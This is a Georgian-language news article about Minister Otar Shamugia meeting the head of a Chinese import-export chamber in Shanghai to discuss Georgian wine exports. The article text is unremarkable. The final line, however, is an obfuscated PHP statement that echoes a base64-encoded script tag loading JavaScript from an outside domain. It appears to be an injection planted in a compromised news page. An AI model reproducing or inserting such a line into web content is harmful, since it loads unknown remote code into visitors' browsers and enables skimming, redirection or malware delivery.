celsiusi
ავერსი შნაიდერი

საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრი ოთარ შამუგია შანხაიში ჩინეთის სახალხო რესპუბლიკის სურსათის, ადგილობრივი და ცხოველური პროდუქტების იმპორტ-ექსპორტის სავაჭრო პალატის პრეზიდენტს, ცაო დეჟონგს შეხვდა.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს პრესსამსახურის ინფორმაციით, შეხვედრაზე აღინიშნა, რომ ჩინეთის სახალხო რესპუბლიკასა და საქართველოს შორის მჭიდრო და ნაყოფიერი თანამშრომლობა არსებობს. ჩინეთი ქართული ღვინის ერთ-ერთი მთავარი სტრატეგიული საექსპორტო ბაზარია; 2013 წლიდან ხორციელდება მიზანმიმართული მარკეტინგული კამპანია, საქართველო სისტემატურად იღებს მონაწილეობას საერთაშორისო გამოფენებსა და სხვა მარკეტინგულ ღონისძიებებში, რამაც ჩინეთის ბაზარზე ქართული ღვინის ექსპორტის უპრეცედენტო ზრდა გამოიწვია.

„საკმაოდ ამბიციური გეგმები გვაქვს და იმის გათვალისწინებით, რომ ჩინეთის სახალხო რესპუბლიკა საქართველოს სტრატეგიული და საიმედო პარტნიორია, ვიმედოვნებთ, რომ ქართული ღვინო, რომლის უკანაც 8000-წლიანი განვითარების ისტორია დგას, ბაზარზე თავს დაიმკვიდრებს როგორც კონკურენტუნარიანი, პრემიუმ სეგმენტის კატეგორია. ღვინო ჩვენი კულტურის განუყოფელი ნაწილია, ისევე, როგორც ჩინეთისთვის – ჩაი. ჩვენ ყველაზე უკეთ ვიცით, რამდენად პრიორიტეტულია ქვეყნისთვის მრავალსაუკუნოვანი ისტორიის მქონე დარგი, როდესაც კონკრეტული პროდუქტი განიხილება არა როგორც მხოლოდ საექსპორტო პროდუქტი, არამედ როგორც ქვეყნის იდენტობის ნაწილი“, – განაცხადა ოთარ შამუგიამ.

მინისტრმა ხაზი გაუსვა ჩინეთის სახალხო რესპუბლიკის სურსათის, ადგილობრივი და ცხოველური პროდუქტების იმპორტ-ექსპორტის სავაჭრო პალატასთან აქტიური თანამშრომლობის როლს ქართული ღვინის ჩინეთის ბაზარზე ექსპორტის გაზრდის პროცესში.

როგორც ჩინეთის სავაჭრო პალატის პრეზიდენტმა აღნიშნა, პალატის საქმიანობის სფეროებს მიეკუთვნება საერთაშორისო ვაჭრობის რეგულირება და მომსახურება ისეთ პროდუქტებთან მიმართებით, როგორებიცაა: მარცვლეული, სურსათი, ცოცხალი ცხოველები, ცხოველური პროდუქტები, ბოსტნეული, ღვინო და სხვა სასმელები.

„საქართველო ცენტრალური აზიის ქვეყნებიდან ყველაზე დიდი რაოდენობის ღვინის ექსპორტს ახდენს ჩინეთში. წელს, იანვარ-სექტემბრის პერიოდში ჩინეთში 10 მილიონ დოლარზე მეტი ღირებულების ქართული ღვინო შემოვიდა. მინისტრმა საჩუქრად გადმომცა ქართული ღვინო, რომელიც განსაკუთრებული პროდუქტია. მე მჯერა, რომ გამოფენაზე ქართული ღვინის წარმოდგენით, პოპულარიზაციის ხელშემწყობი სხვადასხვა აქტივობის და ჩვენი ქართულ მხარესთან დაგეგმილი თანამშრომლობის საშუალებით, ქართული ღვინო და სოფლის მეურნეობის სხვა პროდუქტები ჩინელ მომხმარებლებში პოპულარობით ისარგებლებს, ჩინურ ბაზარზე გაიზრდება ქართული პროდუქტების რაოდენობა. საქართველოს დელეგაციას შანხაიში წარმატებულ ვიზიტს ვუსურვებ, ქართულ პროდუქტს კი – ჩინეთში მეტ პოპულარობას“, – განაცხადა ცაო დეჟონგმა.

როგორც შეხვედრაზე მხარეებმა განაცხადეს, თავისუფალი სავაჭრო ურთიერთობებისა და ერთობლივად გადადგმული ნაბიჯების გათვალისწინებით, არსებობს შესაძლებლობა, რომ ორ ქვეყანას შორის სავაჭრო ურთიერთობები გაღრმავდეს. ჩინეთის სავაჭრო პალატის პრეზიდენტთან გამართული შეხვედრა ქალაქ შანხაიში საერთაშორისო იმპორტის უმსხვილესი გამოფენის, China International Import Expo-ს (CIIE) გახსნის ფარგლებში გაიმართა. შეხვედრას, საქართველოს გარემოს დაცვისა და სოფლის მეურნეობის მინისტრთან, ოთარ შამუგიასთან ერთად, საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრის მოადგილეები გენადი არველაძე და ირაკლი ნადარეიშვილი, სააგენტოს „აწარმოე საქართველოში“ დირექტორი მიხეილ ხიდურელი და ჩინეთის სახალხო რესპუბლიკაში საქართველოს საგანგებო და სრულუფლებიანი ელჩი არჩილ კალანდია ესწრებოდნენ.

236
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");